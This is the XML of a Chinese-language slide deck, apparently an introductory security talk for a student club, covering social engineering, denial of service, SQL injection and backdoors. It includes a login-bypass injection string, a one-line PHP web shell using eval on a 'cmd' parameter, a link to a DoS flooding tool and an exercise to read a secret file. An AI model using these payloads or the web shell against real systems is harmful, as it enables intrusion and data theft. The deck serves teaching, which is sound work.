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6" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="265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1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0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665E195-C89C-4871-8AE9-903FDB8B6D9D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2D6987-FB6D-4DB8-81B8-AD0F35E3BB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k6KkImZjs295YsXg-hmwNzpHdKJZch6s/view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資訊安全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講者：退休老社長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吳邦寧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61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AB60-A92A-4E7C-9887-86CCC5FE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資料庫隱碼攻擊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INJECTION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97741-7E9D-422C-9947-056A637E8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受害者伺服器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(Victim Server)</a:t>
            </a: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帳號密碼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admin/admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA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‘ or 1=1 or ‘</a:t>
            </a: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3715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4191-8546-4753-B6B7-1268854A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Backdoor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76D5-F692-49AA-A19F-39296E528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方便駭客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(Hacker)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操控受害者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(Victim)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的工具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舉例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你被唐鳳腦波控制了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你知道為什麼8天都沒有習近平的消息嗎？ 因為你的腦波全被他控制了">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065AEC4D-6332-480C-BB94-BF9E40028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20380"/>
            <a:ext cx="4637747" cy="285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300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D687-7D54-4270-9C3A-1FD9F27F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Backdoor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EEDEB-C593-4938-A8AF-731282DAF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受害者伺服器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(Victim Server)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後門已經先植入好了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傳說中的一句話後門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CA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&lt;?php echo eval($_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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’]); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-CA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lvl="1"/>
            <a:endParaRPr lang="en-CA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365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A17B-B3DB-453E-8EE9-B7F1DEEE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後門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Backdoor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FC9A9-423D-47CB-B61B-5D1C2A7EF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system("cat /file.txt");</a:t>
            </a:r>
          </a:p>
          <a:p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請抓出位於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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/secret.txt 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的機密資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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lvl="1"/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5487580.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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87.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0972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AE8C-1607-4DCA-B7CA-EE4DC857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結尾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1C513-5033-4178-828E-E4AAAA24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不要做壞事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就算做了壞事，也不要被抓到</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" strike="sngStrik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516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在開始之前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駭客的道德宣誓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我要畢業了，我可以肆無忌憚的亂教黑魔法了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" strike="sngStrik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2416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474C-0735-45F4-AD70-C4D66D4E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社交工程 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(Social Engineering)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43805-285A-4BE2-8E47-16A12C1BF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智障網管。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舉例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午餐系統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意外把最高權限密碼公開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吳邦寧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糟糕的電腦使用習慣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166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6117-9550-4988-908F-0732F1AA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社交工程 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(Social Engineering)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201B2-6646-41FD-A896-F00172B14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慘案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B6768-80D9-46FA-830D-DCC4FA661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858" t="23486" r="23830" b="63303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2906624"/>
            <a:ext cx="3171038" cy="1646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8E3C58-E941-45EC-8923-DCCE6FB8B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886" y="2177963"/>
            <a:ext cx="5823759" cy="3240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962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74CE-4036-4567-B270-5F65F0871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514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社交工程 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(Social Engineering)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B2D8-4FFF-4676-BE61-762B42C58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187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275C-B7AE-4E32-9365-0DF744C9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阻斷服務式攻擊 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(DoS)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D8973-1F3A-4DA5-A4DD-B4765D54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讓伺服器無法運作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舉例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一千個人同時打電話給你 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(Flooding)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在你的飯裡面下藥 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(Malicious packet/request)</a:t>
            </a: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96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AA0C-309C-4655-8F06-A4314FDB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阻斷服務式攻擊 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(DoS)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87BBB-C870-444F-BA27-9088F5B00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受害者伺服器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(Victim server)</a:t>
            </a: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LOIC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邦寧小工具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https://drive.google.com/file/d/1k6KkImZjs295YsXg-hmwNzpHdKJZch6s/view?usp=sharing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187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BB87-38A6-4F26-A517-44B988E1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阻斷服務式攻擊 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(DoS)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57F27-54CF-4D05-91C0-48C2B20C9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更進一步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 Synchronize Flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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ICMP amplification flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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ARP Spoof</a:t>
            </a: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惡意封包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Malicious packet)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惡意請求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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(Malicious request)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598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3F74-268E-4B66-8B47-F90B6077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資料庫隱碼攻擊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CA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INJECTION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9D91D-E907-4597-8E41-6313F813B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讓資料被執行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舉例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沒魚蝦也好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沒魚蝦，也好</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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沒魚，蝦也好</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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7812298"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Melancholy abstract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lancholy abstract design slides.potx" id="{0C631111-0761-4095-80FF-907E1270642A}" vid="{4C722CC6-EA24-4B9B-A48E-3EC5DC6964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Melancholy abstract design slides</Template>
  <TotalTime>398</TotalTime>
  <Words>326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微軟正黑體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Melancholy abstract design template</vt:lpstr>
      <vt:lpstr>資訊安全</vt:lpstr>
      <vt:lpstr>在開始之前…</vt:lpstr>
      <vt:lpstr>社交工程 (Social Engineering)</vt:lpstr>
      <vt:lpstr>社交工程 (Social Engineering)</vt:lpstr>
      <vt:lpstr>社交工程 (Social Engineering)</vt:lpstr>
      <vt:lpstr>阻斷服務式攻擊 (DoS)</vt:lpstr>
      <vt:lpstr>阻斷服務式攻擊 (DoS)</vt:lpstr>
      <vt:lpstr>阻斷服務式攻擊 (DoS)</vt:lpstr>
      <vt:lpstr>資料庫隱碼攻擊 (SQL INJECTION)</vt:lpstr>
      <vt:lpstr>資料庫隱碼攻擊 (SQL INJECTION)</vt:lpstr>
      <vt:lpstr>後門 (Backdoor)</vt:lpstr>
      <vt:lpstr>後門 (Backdoor)</vt:lpstr>
      <vt:lpstr>後門 (Backdoor)</vt:lpstr>
      <vt:lpstr>結尾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 </dc:title>
  <dc:creator>Lawrence Wu</dc:creator>
  <cp:lastModifiedBy>Lawrence Wu</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-25T13:10:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-27T16:02:21Z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74064600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